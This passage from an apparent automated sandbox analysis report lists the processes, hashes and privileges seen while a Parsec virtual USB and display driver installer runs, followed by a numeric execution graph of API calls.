                              Commandline:DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf" "9" "464910f03" "000000000000015C" "WinSta0\Default" "0000000000000174" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba"
                              Imagebase:0x7ff67f0b0000
                              File size:337'920 bytes
                              MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:56
                              Start time:21:12:11
                              Start date:13/11/2024
                              Path:C:\Windows\System32\drvinst.exe
                              Wow64 process (32bit):false
                              Commandline:DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000170"
                              Imagebase:0x7ff67f0b0000
                              File size:337'920 bytes
                              MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:57
                              Start time:21:12:12
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              Wow64 process (32bit):false
                              Commandline:nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
                              Imagebase:0x7ff694b70000
                              File size:588'160 bytes
                              MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:58
                              Start time:21:12:12
                              Start date:13/11/2024
                              Path:C:\Windows\System32\drvinst.exe
                              Wow64 process (32bit):false
                              Commandline:DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf" "9" "43799a85b" "000000000000015C" "WinSta0\Default" "00000000000000F4" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds"
                              Imagebase:0x7ff67f0b0000
                              File size:337'920 bytes
                              MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:59
                              Start time:21:12:13
                              Start date:13/11/2024
                              Path:C:\Windows\System32\drvinst.exe
                              Wow64 process (32bit):false
                              Commandline:DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "00000000000000F4" "WinSta0\Default"
                              Imagebase:0x7ff67f0b0000
                              File size:337'920 bytes
                              MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:60
                              Start time:21:12:14
                              Start date:13/11/2024
                              Path:C:\Windows\System32\runonce.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\runonce.exe" -r
                              Imagebase:0x7ff701920000
                              File size:61'952 bytes
                              MD5 hash:9ADEF025B168447C1E8514D919CB5DC0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:61
                              Start time:21:12:14
                              Start date:13/11/2024
                              Path:C:\Windows\System32\grpconv.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\grpconv.exe" -o
                              Imagebase:0x7ff7ca320000
                              File size:52'736 bytes
                              MD5 hash:8531882ACC33CB4BDC11B305A01581CE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:63
                              Start time:21:12:15
                              Start date:13/11/2024
                              Path:C:\Windows\System32\drvinst.exe
                              Wow64 process (32bit):false
                              Commandline:DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "000000000000018C" "WinSta0\Default"
                              Imagebase:0x7ff67f0b0000
                              File size:337'920 bytes
                              MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:64
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:65
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:66
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
                              Imagebase:0x400000
                              File size:517'256 bytes
                              MD5 hash:4B9A3048286692A865187013B70F44E8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Has exited:true

                              General

                              Target ID:67
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wevtutil.exe
                              Wow64 process (32bit):true
                              Commandline:wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
                              Imagebase:0x970000
                              File size:208'384 bytes
                              MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:68
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:69
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\System32\wevtutil.exe
                              Wow64 process (32bit):false
                              Commandline:wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
                              Imagebase:0x7ff726270000
                              File size:278'016 bytes
                              MD5 hash:1AAE26BD68B911D0420626A27070EB8D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:70
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:71
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:72
                              Start time:21:12:17
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              Wow64 process (32bit):false
                              Commandline:.\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
                              Imagebase:0x7ff6750a0000
                              File size:588'160 bytes
                              MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Has exited:true

                              General

                              Target ID:73
                              Start time:21:12:17
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              Wow64 process (32bit):false
                              Commandline:.\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
                              Imagebase:0x7ff6750a0000
                              File size:588'160 bytes
                              MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:74
                              Start time:21:12:17
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              Wow64 process (32bit):false
                              Commandline:.\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
                              Imagebase:0x7ff6750a0000
                              File size:588'160 bytes
                              MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:8.5%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:13.6%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:43
                                execution_graph 32195 468806 32196 468823 32195->32196 32197 46880b fputs 32195->32197 32199 468844 32196->32199 32674 412790 32196->32674 32370 4124c4 fputc 32197->32370 32371 425134 32199->32371 32203 4688da 32495 412350 malloc 32203->32495 32204 4688b9 GetStdHandle GetConsoleScreenBufferInfo 32204->32203 32210 4689ec 32211 4689f2 _CxxThrowException 32210->32211 32212 468a0e 32210->32212 32211->32212 32544 442250 32212->32544 32219 468a82 free 32226 468a9c 32219->32226 32221 468a6d 32222 412790 14 API calls 32221->32222 32224 468a78 32222->32224 32223 468b40 32581 452c2c 32223->32581 32682 4124c4 fputc 32224->32682 32226->32223 32227 468b1c _CxxThrowException 32226->32227 32683 413600 32226->32683 32227->32223 32231 468a80 32231->32219 32232 468b72 _CxxThrowException 32238 468b96 32232->32238 32233 468c34 32244 468cb1 32233->32244 32595 41e07c 32233->32595 32238->32233 32241 468c38 _CxxThrowException 32238->32241 32693 448ba4 12 API calls 32238->32693 32694 4678dc 6 API calls 32238->32694 32239 468af2 32690 4136a8 32239->32690 32241->32233 32243 468c95 _CxxThrowException 32243->32244 32656 4124c4 fputc 32244->32656 32245 468b07 _CxxThrowException 32245->32227 32247 468c15 free 32247->32233 32247->32238 32249 468ce9 fputs 32657 4124c4 fputc 32249->32657 32251 468de8 32658 4124c4 fputc 32251->32658 32254 468df2 fputs 32659 4124c4 fputc 32254->32659 32257 468e0a strlen strlen 32259 4691e2 32257->32259 32260 468e48 32257->32260 32660 4124c4 fputc 32259->32660 32697 4662b4 fputc fputs fputs fputc 32260->32697 32282 468d01 32282->32251 32695 4662b4 fputc fputs fputs fputc 32282->32695 32696 4124c4 fputc 32282->32696 32370->32196 32372 425184 32371->32372 32373 42515e 32371->32373 32375 4136a8 3 API calls 32372->32375 32757 4386a8 7 API calls 32373->32757 32378 425195 32375->32378 32376 425172 _CxxThrowException 32376->32372 32377 4251bc free 32758 4386a8 7 API calls 32377->32758 32378->32377 32381 425206 free 32378->32381 32380 4251dc _CxxThrowException 32380->32378 32383 42524f 32381->32383 32384 42523c 32381->32384 32386 425271 32383->32386 32759 413798 32383->32759 32385 41576c 8 API calls 32384->32385 32385->32383 32388 4252bc wcscmp 32386->32388 32396 4252d1 32386->32396 32389 4252dc 32388->32389 32388->32396 32765 4386a8 7 API calls 32389->32765 32390 42539f 32766 423c20 11 API calls 32390->32766 32393 4252f0 _CxxThrowException 32393->32396 32394 4253c3 32767 423c20 11 API calls 32394->32767 32396->32390 32400 42552a 32396->32400 32397 4253db 32398 425413 32397->32398 32768 424624 159 API calls 32397->32768 32407 425446 32398->32407 32769 424624 159 API calls 32398->32769 32770 4386a8 7 API calls 32400->32770 32403 42553e _CxxThrowException 32403->32407 32404 4255fa 32713 42443c 32404->32713 32405 4255b4 32409 413798 4 API calls 32405->32409 32407->32404 32407->32405 32771 4386a8 7 API calls 32407->32771 32412 4255c5 32409->32412 32411 4255a2 _CxxThrowException 32411->32405 32412->32404 32772 4386a8 7 API calls 32412->32772 32413 425679 32414 4256a6 32413->32414 32416 413798 4 API calls 32413->32416 32730 41576c 32414->32730 32415 413798 4 API calls 32415->32413 32416->32414 32420 4255e8 _CxxThrowException 32420->32404 32423 425e1d 32424 425e95 32423->32424 32434 425e22 32423->32434 32427 425f16 32424->32427 32428 425e9a 32424->32428 32425 425b93 32425->32423 32426 425bda 32425->32426 32782 4386a8 7 API calls 32425->32782 32783 424e4c 75 API calls 32426->32783 32430 425f1f _CxxThrowException 32427->32430 32447 425b03 32427->32447 32432 416af4 51 API calls 32428->32432 32433 425ea9 32432->32433 32799 41646c 14 API calls 32433->32799 32434->32447 32798 4386a8 7 API calls 32434->32798 32435 425bc8 _CxxThrowException 32435->32426 32436 425beb 32784 423d28 32436->32784 32437 4257b0 32441 42589e wcscmp 32437->32441 32452 4258b3 32437->32452 32440 425eb2 32444 41576c 8 API calls 32440->32444 32445 42590e wcscmp 32441->32445 32441->32452 32442 416af4 51 API calls 32442->32452 32444->32447 32449 42592c wcscmp 32445->32449 32445->32452 32446 425e77 _CxxThrowException 32446->32447 32447->32203 32447->32204 32450 425950 32449->32450 32449->32452 32775 4386a8 7 API calls 32450->32775 32452->32442 32460 425976 32452->32460 32773 41646c 14 API calls 32452->32773 32774 4386a8 7 API calls 32452->32774 32454 425964 _CxxThrowException 32454->32460 32455 413798 4 API calls 32461 425cb3 32455->32461 32457 425dbe 32463 425de0 32457->32463 32467 413798 4 API calls 32457->32467 32458 425cde 32458->32457 32464 425d4c 32458->32464 32794 4386a8 7 API calls 32458->32794 32459 4259d5 32466 425a07 32459->32466 32777 424624 159 API calls 32459->32777 32460->32459 32776 424624 159 API calls 32460->32776 32461->32458 32793 413c30 memmove 32461->32793 32462 4258fc _CxxThrowException 32462->32445 32463->32447 32797 4386a8 7 API calls 32463->32797 32464->32457 32470 425d7d 32464->32470 32795 4386a8 7 API calls 32464->32795 32472 425a2e 32466->32472 32778 422ee0 7 API calls 32466->32778 32467->32463 32469 425d3a _CxxThrowException 32469->32464 32470->32457 32796 4386a8 7 API calls 32470->32796 32747 416af4 32472->32747 32478 425e0b _CxxThrowException 32478->32423 32479 425d6b _CxxThrowException 32479->32470 32483 425dac _CxxThrowException 32483->32457 32486 425a54 32487 413798 4 API calls 32486->32487 32489 425a73 32486->32489 32487->32489 32488 425ac9 32488->32447 32490 413798 4 API calls 32488->32490 32489->32447 32489->32488 32780 4386a8 7 API calls 32489->32780 32492 425aeb 32490->32492 32781 41ab6c _CxxThrowException 32492->32781 32493 425ab7 _CxxThrowException 32493->32488 32496 412381 32495->32496 32497 41236b _CxxThrowException 32495->32497 32498 467b78 32496->32498 32497->32496 32499 41354c 2 API calls 32498->32499 32500 467bbc 32499->32500 32501 449944 32500->32501 32503 44997c 32501->32503 32505 4499a9 32501->32505 32502 449c87 33143 4470ac 32502->33143 32503->32505 33283 441784 32503->33283 32504 4499d1 free free free 32504->32505 32505->32504 32534 4499ef 32505->32534 32508 41354c malloc _CxxThrowException 32508->32534 32515 449cd5 32517 449cef 32515->32517 32518 413730 4 API calls 32515->32518 32516 449de7 free 32516->32210 32519 413504 4 API calls 32517->32519 32518->32517 32520 449d05 32519->32520 33254 4496f8 32520->33254 32522 4138a8 malloc _CxxThrowException free 32522->32534 32525 449b0d free free 32525->32534 32526 449d27 32527 413504 4 API calls 32526->32527 32529 449d3d 32527->32529 32531 4496f8 196 API calls 32529->32531 32530 455a44 malloc _CxxThrowException _CxxThrowException memmove free 32530->32534 32532 449d49 free 32531->32532 32536 449d5f 32532->32536 32537 449cd0 32532->32537 32533 412350 malloc _CxxThrowException 32533->32534 32534->32502 32534->32508 32534->32522 32534->32530 32534->32533 32538 441784 7 API calls 32534->32538 32539 449bdb free 32534->32539 32541 449c08 memmove 32534->32541 33290 448580 32534->33290 33307 448798 9 API calls 32534->33307 33308 4418a8 malloc _CxxThrowException memmove memmove 32534->33308 32536->32537 32542 449d91 32536->32542 32537->32516 32538->32534 32539->32534 32540 449d94 GetProcAddress 32540->32542 32541->32534 32542->32540 32543 449dca 32542->32543 32543->32516 32543->32537 32545 41354c 2 API calls 32544->32545 32546 442288 32545->32546 32547 4138a8 3 API calls 32546->32547 32548 4422ce 32547->32548 32549 41354c 2 API calls 32548->32549 32550 442300 32549->32550 32551 413600 2 API calls 32550->32551 32552 442317 32551->32552 32553 448580 21 API calls 32552->32553 32554 442328 free free 32553->32554 32555 455a44 5 API calls 32554->32555 32556 442361 32555->32556 32557 412350 2 API calls 32556->32557 32559 442369 32557->32559 32558 4423a9 32561 455a44 5 API calls 32558->32561 32559->32558 32560 44239e free 32559->32560 32560->32558 32562 4423b6 32561->32562 32563 412350 2 API calls 32562->32563 32564 4423c0 32563->32564 32565 4423da 32564->32565 33470 4418a8 malloc _CxxThrowException memmove memmove 32564->33470 32567 441784 7 API calls 32565->32567 32568 4423f8 32567->32568 32569 41354c 32568->32569 32570 412350 2 API calls 32569->32570 32571 413566 32570->32571 32572 44827c 32571->32572 32573 448348 32572->32573 32577 4482b0 32572->32577 32573->32219 32681 4124c4 fputc 32573->32681 32574 4139ac 6 API calls 32574->32577 32575 4139f0 malloc _CxxThrowException memmove free _CxxThrowException 32575->32577 32577->32573 32577->32574 32577->32575 32579 4139ac 6 API calls 32577->32579 33471 425f6c 10 API calls 32577->33471 33472 413920 _CxxThrowException 32577->33472 32580 448303 free 32579->32580 32580->32577 32582 452c5e 32581->32582 32592 452c7a 32581->32592 32584 452c62 free 32582->32584 32583 452dda 32583->32232 32583->32238 32584->32584 32584->32592 32586 452ddc free 32586->32583 32588 452dea free 32588->32583 32589 452df8 free 32589->32583 32590 455a44 5 API calls 32590->32592 32591 412350 2 API calls 32591->32592 32592->32583 32592->32586 32592->32588 32592->32589 32592->32590 32592->32591 32593 452d9a memmove 32592->32593 32594 452db2 free 32592->32594 33473 41ab0c malloc _CxxThrowException memmove 32592->33473 33474 44a948 16 API calls 32592->33474 32593->32594 32594->32583 32594->32592 32596 41e0b1 32595->32596 32597 41e0df 32595->32597 32596->32597 32600 41e0c9 free free 32596->32600 32598 41e11d 32597->32598 32601 41e107 free free 32597->32601 32599 41e41e 32598->32599 33475 412db8 32598->33475 32602 41e595 32599->32602 32606 412db8 2 API calls 32599->32606 32600->32596 32601->32597 32602->32243 32602->32244 32605 41354c 2 API calls 32607 41e153 32605->32607 32633 41e43d 32606->32633 32609 41e16c free 32607->32609 32654 41e17c 32607->32654 32608 41e58b free 32608->32602 32610 41e3f8 free 32609->32610 32610->32602 32611 41e409 free free 32611->32599 32612 41e565 32613 41be6c VariantClear 32612->32613 32625 41e56f free 32613->32625 32614 41e33e 32616 41be6c VariantClear 32614->32616 32615 41bf00 VariantClear 32615->32633 32618 41be6c VariantClear 32618->32654 32619 41bf00 VariantClear 32619->32654 32621 41e563 32621->32608 32622 41e572 32624 41be6c VariantClear 32622->32624 32623 41e339 32623->32611 32624->32625 32625->32602 32627 41e35b 32628 41be6c VariantClear 32627->32628 32630 41e365 free 32628->32630 32629 455a44 5 API calls 32629->32633 32630->32610 32632 412350 2 API calls 32632->32633 32633->32608 32633->32612 32633->32615 32633->32621 32633->32622 32633->32629 32633->32632 32639 41be6c VariantClear 32633->32639 33484 412f28 malloc _CxxThrowException free 32633->33484 33485 412e34 32633->33485 32634 41e378 32636 41be6c VariantClear 32634->32636 32637 41d894 VariantClear 32637->32654 32639->32633 32640 41e392 32641 41be6c VariantClear 32640->32641 32642 41e39c free 32641->32642 32642->32610 32643 41e3ac 32645 41be6c VariantClear 32643->32645 32644 41d93c VariantClear 32644->32654 32646 41e3b6 free 32645->32646 32646->32610 32647 41e3c6 32648 41be6c VariantClear 32647->32648 32650 41e3e0 32651 41be6c VariantClear 32650->32651 32652 455a44 5 API calls 32652->32654 32654->32611 32654->32614 32654->32618 32654->32619 32654->32623 32654->32627 32654->32634 32654->32637 32654->32640 32654->32643 32654->32644 32654->32647 32654->32650 32654->32652 33478 41da48 32654->33478 33483 412f28 malloc _CxxThrowException free 32654->33483 32656->32249 32657->32282 32658->32254 32659->32257 32675 412db8 2 API calls 32674->32675 32676 4127b0 32675->32676 32677 4135b8 3 API calls 32676->32677 32678 4127be 32677->32678 33504 4124e4 32678->33504 32681->32221 32682->32231 32684 413614 32683->32684 32685 413280 2 API calls 32684->32685 32686 413628 32685->32686 32687 4139ac 32686->32687 33512 413304 32687->33512 32691 413280 2 API calls 32690->32691 32692 4136bd memmove 32691->32692 32692->32245 32693->32238 32694->32247 32696->32282 32714 424467 32713->32714 32715 413600 2 API calls 32714->32715 32722 4244ca 32714->32722 32716 4244ab 32715->32716 32800 422ee0 7 API calls 32716->32800 32717 4245f4 32717->32413 32717->32415 32719 424599 32804 4386a8 7 API calls 32719->32804 32720 4244bf free 32720->32722 32722->32717 32722->32719 32725 424597 32722->32725 32801 4241f4 112 API calls 32722->32801 32802 4240ec 14 API calls 32722->32802 32803 422ee0 7 API calls 32722->32803 32723 4245ad _CxxThrowException 32723->32725 32725->32717 32805 4386a8 7 API calls 32725->32805 32729 4245e2 _CxxThrowException 32729->32717 32731 415793 32730->32731 32732 41578b 32730->32732 32733 4157ca 32731->32733 32735 4157b5 free free 32731->32735 32739 42492c 32732->32739 32806 4151a8 malloc _CxxThrowException _CxxThrowException memmove free 32733->32806 32735->32731 32736 412350 2 API calls 32737 4157e0 32736->32737 32737->32732 32737->32736 32738 4136a8 3 API calls 32737->32738 32738->32737 32740 424a0a 32739->32740 32743 424956 32739->32743 32740->32425 32740->32437 32741 41354c malloc _CxxThrowException 32741->32743 32742 413798 4 API calls 32742->32743 32743->32740 32743->32741 32743->32742 32807 413730 32743->32807 32812 423e50 6 API calls 32743->32812 32746 4249e0 free free 32746->32740 32746->32743 32748 416b09 32747->32748 32749 416b38 32747->32749 32748->32749 32813 4164dc 49 API calls 32748->32813 32750 416b70 32749->32750 32752 416b5b free free 32749->32752 32753 43c90c 32750->32753 32752->32749 32754 43c91e 32753->32754 32755 425a48 32753->32755 32754->32755 32814 43c694 32754->32814 32779 41646c 14 API calls 32755->32779 32757->32376 32758->32380 32760 4137e4 32759->32760 32761 4137ac 32759->32761 32760->32386 32762 4137cf memmove 32761->32762 32763 412350 2 API calls 32761->32763 32762->32760 32764 4137be free 32763->32764 32764->32762 32765->32393 32766->32394 32767->32397 32768->32398 32769->32407 32770->32403 32771->32411 32772->32420 32773->32452 32774->32462 32775->32454 32776->32459 32777->32466 32778->32472 32779->32486 32780->32493 32781->32447 32782->32435 32783->32436 32785 423d49 32784->32785 32787 423d51 32784->32787 32785->32455 32785->32458 32786 423d92 33142 4151a8 malloc _CxxThrowException _CxxThrowException memmove free 32786->33142 32787->32786 32789 423d73 free free free 32787->32789 32789->32787 32790 412350 2 API calls 32792 423da6 32790->32792 32791 4136a8 malloc _CxxThrowException memmove 32791->32792 32792->32785 32792->32790 32792->32791 32793->32458 32794->32469 32795->32479 32796->32483 32797->32478 32798->32446 32799->32440 32800->32720 32801->32722 32802->32722 32803->32722 32804->32723 32805->32729 32806->32737 32808 413746 32807->32808 32809 413775 memmove 32808->32809 32810 412350 2 API calls 32808->32810 32809->32743 32811 413764 free 32810->32811 32811->32809 32812->32746 32813->32748 32832 4398b8 32814->32832 32817 4398b8 108 API calls 32822 43c6c5 32817->32822 32818 43c8c3 32818->32754 32821 43c85d 32821->32818 32826 43c694 119 API calls 32821->32826 32852 4134d0 32821->32852 32855 43826c malloc _CxxThrowException memmove 32821->32855 32828 43c722 32822->32828 32836 438580 32822->32836 32825 4161fc 7 API calls 32825->32828 32827 43c8a2 free free 32826->32827 32827->32818 32827->32821 32828->32821 32828->32825 32829 43c7eb memmove 32828->32829 32850 4128e8 CharUpperW CharUpperW 32828->32850 32851 416048 6 API calls 32828->32851 32829->32828 32833 439925 32832->32833 32834 4398d0 32832->32834 32833->32817 32834->32833 32835 438580 108 API calls 32834->32835 32835->32834 32837 43865a 32836->32837 32838 4385a0 32836->32838 32837->32822 32838->32837 32839 41354c 2 API calls 32838->32839 32840 4385ea 32839->32840 32841 4134d0 4 API calls 32840->32841 32842 4385fb 32841->32842 32843 438621 32842->32843 32844 43860a free free 32842->32844 32856 4188ec 32843->32856 32844->32837 32847 438645 free free 32847->32837 32848 413798 4 API calls 32849 438644 32848->32849 32849->32847 32850->32828 33139 413470 32852->33139 32854 4134f8 32854->32821 32855->32821 32857 418913 32856->32857 32858 41896f 32857->32858 32859 418937 32857->32859 32861 41897f 32858->32861 32863 418a5f 32858->32863 32860 413730 4 API calls 32859->32860 32962 41895e 32860->32962 32862 413730 4 API calls 32861->32862 32865 4189aa 32862->32865 32870 418ce8 32863->32870 32987 4135b8 32863->32987 32866 418a1e 32865->32866 32867 4189c1 32865->32867 32981 419fc4 32866->32981 32980 41bc48 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 32867->32980 32868 418a8c 32872 4135b8 3 API calls 32868->32872 32874 418db9 32870->32874 32876 418d31 32870->32876 32885 418a9a 32872->32885 32878 418ff5 32874->32878 32879 418dcf 32874->32879 32906 418e36 32874->32906 32875 418a08 32875->32866 32877 418a0c 32875->32877 32995 4186c8 32876->32995 32877->32962 32963 418318 32878->32963 32882 4186c8 48 API calls 32879->32882 32887 418dd7 32882->32887 32895 418ae4 32885->32895 32991 4139f0 malloc _CxxThrowException memmove free _CxxThrowException 32885->32991 32887->32878 32892 418df6 32887->32892 32889 418d55 32893 413730 4 API calls 32889->32893 32890 419041 32977 4182ec 32890->32977 32896 4182ec FindClose 32892->32896 32897 418d84 32893->32897 32894 418b44 32900 4188ec 84 API calls 32894->32900 32895->32894 32899 418b08 32895->32899 32896->32962 33006 418770 49 API calls 32897->33006 32898 419023 33010 418770 49 API calls 32898->33010 32902 418b42 32899->32902 32908 413798 4 API calls 32899->32908 32904 418b54 32900->32904 32911 4136a8 3 API calls 32902->32911 32904->32902 32910 418cd3 free free 32904->32910 32905 41902e 32912 4182ec FindClose 32905->32912 32906->32878 33007 418770 49 API calls 32906->33007 32908->32902 32909 418da4 32914 4182ec FindClose 32909->32914 32910->32870 32915 418b7e 32911->32915 32912->32962 32913 418e71 32916 418e75 32913->32916 32917 418e96 32913->32917 32914->32962 32918 41354c 2 API calls 32915->32918 32919 413730 4 API calls 32916->32919 32920 4135b8 3 API calls 32917->32920 32921 418b89 32918->32921 32923 418e81 32919->32923 32924 418ea3 32920->32924 32992 418680 53 API calls 32921->32992 32925 4182ec FindClose 32923->32925 32926 418eb8 32924->32926 33008 4132b0 _CxxThrowException 32924->33008 32925->32962 32929 418ee3 32926->32929 33009 4132b0 _CxxThrowException 32926->33009 32927 418bf5 free free 32932 4182ec FindClose 32927->32932 32930 418318 48 API calls 32929->32930 32934 418f1a 32930->32934 32931 418c25 SetLastError free free 32937 4182ec FindClose 32931->32937 32936 418c14 free 32932->32936 32939 418f6e 32934->32939 32940 418f1e wcscmp 32934->32940 32941 418cc2 free 32936->32941 32938 418c50 free 32937->32938 32938->32941 32945 4186c8 48 API calls 32939->32945 32940->32939 32942 418f3e 32940->32942 32941->32962 32946 413730 4 API calls 32942->32946 32943 418bc5 free 32947 41354c 2 API calls 32943->32947 32944 418c5e 32949 4139ac 6 API calls 32944->32949 32948 418f7e 32945->32948 32950 418f4e free 32946->32950 32951 418ba1 32947->32951 32952 418fa7 32948->32952 32957 418f9b free 32948->32957 32954 418c89 free free 32949->32954 32955 4182ec FindClose 32950->32955 32951->32927 32951->32931 32951->32943 32951->32944 32993 4128e8 CharUpperW CharUpperW 32951->32993 32994 418680 53 API calls 32951->32994 32953 413730 4 API calls 32952->32953 32958 418fd8 free 32953->32958 32959 4182ec FindClose 32954->32959 32955->32962 32957->32878 32960 4182ec FindClose 32958->32960 32961 418cb4 free 32959->32961 32960->32962 32961->32941 32962->32847 32962->32848 32964 4182ec FindClose 32963->32964 32966 41833b 32964->32966 32965 4183b3 32965->32890 32965->32898 32966->32965 32967 418363 32966->32967 32968 418352 FindFirstFileW 32966->32968 32969 4183ad 32967->32969 32971 41354c 2 API calls 32967->32971 32968->32967 32969->32965 32970 413730 4 API calls 32969->32970 32970->32965 32972 418377 32971->32972 33011 41b8b0 32972->33011 32974 41838c 32975 418390 FindFirstFileW 32974->32975 32976 4183a3 free 32974->32976 32975->32976 32976->32969 32978 4182fb FindClose 32977->32978 32979 418308 32977->32979 32978->32979 32979->32962 32980->32875 33116 419f10 32981->33116 32984 41960c 32985 41961b CloseHandle 32984->32985 32986 419628 32984->32986 32985->32986 32986->32962 32988 4135cd 32987->32988 33136 413280 32988->33136 32991->32895 32992->32951 32993->32951 